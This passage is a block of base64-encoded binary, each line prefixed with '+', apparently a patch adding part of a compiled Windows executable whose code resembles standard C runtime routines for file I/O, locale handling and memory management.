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 